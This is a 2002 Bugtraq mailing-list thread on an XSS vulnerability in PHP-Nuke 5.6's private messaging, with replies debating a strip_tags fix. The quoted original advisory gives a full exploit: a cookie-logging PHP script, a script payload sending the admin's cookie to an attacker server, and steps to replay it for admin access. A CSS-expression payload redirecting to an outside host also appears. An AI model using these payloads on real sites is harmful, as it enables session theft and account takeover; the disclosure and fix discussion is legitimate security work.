Bugtraq mailing list archives
RE: PHP-Nuke v5.6 - Users can compromise admin accts.
From: "Eric Stevens" <eric () odysseydesigngroup com>
Date: Fri, 16 Aug 2002 15:56:10 -0400
I think his point is this: simply invoking strip_tags doesn't prevent scripts or other harmfuls from getting through on the tags that you do allow. The PHP manual, under the function for entry for strip_tags() even notes a warning: --- Warning This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users. --- see http://www.php.net/manual/en/function.strip-tags.php Being able to execute arbitrary javascript in a private message would allow you to steal the cookies of the admin, though you may have to do a small amount of social engineering to get the admin to move his mouse overtop of the text inside the appropriate tag for an onMouseOver call. Besides, I believe his exploit would work exactly the same for any of the tags that you do allow. You might do better with the following code: (warning, not tested!!!!!! Haven't played with PHP nuke since version 4.something when I was defaced because of a security bug and stopped using it): $message = strip_tags($message, '<br><b><u><i>'); $string = preg_replace("'(</?[biu][r]?)[^>]*(>)'",$string,"\\1\\2"); Once again, I'll point out that this code hasn't been tested, it's been a long time since I played with PHP Nuke or regular expressions. The idea is to take the four tags that you do allow, and strip out anything between the <, optional /, tag name, and >. -MightyE www.mightye.org -----Original Message----- From: <-delusion-> [mailto:delusi0n () bellsouth net] Sent: Thursday, August 15, 2002 9:16 PM To: bugtraq () securityfocus com Subject: Re: PHP-Nuke v5.6 - Users can compromise admin accts. Jelmer's accusation that my proposed fix is flawed is wrong. He demonstrates a code that uses the <a> tag, if you look at my solution: $message = strip_tags($message, '<br><b><u><i>'); The <a> tag is not allowed. Only the tags <br><b><u><i> are allowed. I did talk to Jelmer and told him my solution successfully stripped the tags from his code, he replied with this message: <?php
$myText = '<a done=false STYLE="visibility : hidden; word-spacing : expression( !(eval(this.done)) ?
location.href=\'http://kuperus.xs4all.nl\'
: 0 ); word-wrap : expression(this.done=true);"> test</a>'; $string = strip_tags($myText, '<a><b><i><u>'); <a> echo $string ?> works on my php 4.06
He uses this string.. $string = strip_tags($myText, '<a><b><i><u>'); <a> Which allows the <a> tag. so therefore his code got executed when he ran it. it was just a mistake on Jelmer's part. If you seek a quick fix for this vuln, just use my solution. It works. -delusion http://digital-delusions.dyn.ee
On Thu, 2002-08-15 at 19:08, Jelmer wrote:IMHO this whole email is just stating the obvious. On top of that the proposed fix is flawed. The PHP strip_tags function does not strip attributes so this is
possible in
your proposed fix : <a done=false STYLE="visibility : hidden; word-spacing : expression( !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 ); word-wrap : expression(this.done=true);"> test</a> its a bit messy but gets the job done. It works by using css expressions
(a
feature afaik native to Internet explorer) in the style tag. -- jelmer ----- Original Message ----- From: "<-delusion->" <delusi0n () bellsouth net> To: <bugtraq () securityfocus com>; <webappsec () secuirtyfocus com> Sent: Thursday, August 15, 2002 10:30 AM Subject: PHP-Nuke v5.6 - Users can compromise admin accts.Tested on PHP-Nuke v5.6 with Mozilla on Linux (should work on past versions and on most browsers) Impact: --------------------------------------------- Allows any user to get admin access to a PHP-Nuke site. Summary: ---------------------------------------------- Due to a XSS flaw in PHPNuke's Private Messaging module, users can
send
messages with html code that will be executed without any filtering. In old
PHPNuke
versions XSS allowed theft of cookies which stored passwords in base64 encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before
it
encodes it into base64 and puts it into a cookie. This made stolen cookies
useless if
the attacker just tried decoding the base64 encrypted pass, because he just got the MD5 encrypted pass. Since PHP Nuke encrypts passes in md5 and then matches the encrypted
pass
with the encrypted one in the database, i was able to use the md5 encrypted
pass i
got from the stolen cookie to authenticate myself. PHPNuke sets cookies by base64 encoding a string that looks like this: username:md5_encrypted_pass:lang Since i can get the md5_encrypted pass all i have to do is launch a
script
that base64 encodes a string like the one above, and sets it as a cookie on my box. Exploit: ------------------------------------------------- For this exploit to work, you must create the following files in your
web
server's directory. cookie.php containing this: <? $fp = fopen("cookie.txt","a"); fputs($fp, $cookie); fclose($fp); print "Message Not Found!"; /* this is so the admin doesnt get scared.
and
thinks its some bug. */ ?> test.php containing: <? $admin = base64_encode("decoded_string") ; setcookie("admin","$admin",time()+2592000); ?> You will find out what to replace decoded_string with.. 1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+doc
ument.cookie);</script> 2. Wait awhile until the admin checks the message then check
cookie.txt on
yer server. 3. From cookie.txt.. copy the encrypted text after admin= and before
the ;
4. go to http://www.isecurelabs.com/base64.php paste the copied text,clickdecode it should give u a string like this: username:md5_encrypted_passwd:language (language may be blank). 5. paste the decoded string into test.php like so. <? $admin = base64_encode("paste decoded string here"); setcookie("admin","$admin",time()+2592000); ?> 6. Login as any user on the site 7. send private message to self containing: <iframe src="http://yerserver/test.php"></iframe> Open the message and a cookie will now be set on yer box, but it will
be
configured with your server's URL. So all u gotta do is replace yer url wit the nuked site. 8. for mozilla edit cookies.txt in yer
~/.mozilla/someprofile/something/
directory replace the url of yer server to the nuked site, for other browsers just find the Cookie from your server and edit it
so
instead of showng your url it shows the url of the nuked site. 9. restart yer browser (close and open up again). go back into the
nuked
site and you are now admin. :D Temp Solution: ------------------------------------------------- Edit reply.php in /modules/Private_Messages/ and make $message be
stripped
of html tags. Go to line 75 in reply.php and add this line: $message = strip_tags($message, '<br><b><u><i>'); That will remove any html tags that arent <br><b><u> or <i>. So it
will
prevent the XSS. ------------------------------------------------- NOTE: I wasnt able to contact the php nuke person, i couldnt find an
on their site, and when i signed up for membership i never got thepassword,so if u can, let them know asap so they can fix this. Another Vulnerability Brought to you by, delusion http://digital-delusions.dyn.ee
Current thread:
- PHP-Nuke v5.6 - Users can compromise admin accts. <-delusion-> (Aug 15)
- Re: PHP-Nuke v5.6 - Users can compromise admin accts. Jelmer (Aug 16)
- <Possible follow-ups>
- Re: PHP-Nuke v5.6 - Users can compromise admin accts. <-delusion-> (Aug 16)
- Re: PHP-Nuke v5.6 - Users can compromise admin accts. Konstantin Riabitsev (Aug 16)
- RE: PHP-Nuke v5.6 - Users can compromise admin accts. Eric Stevens (Aug 16)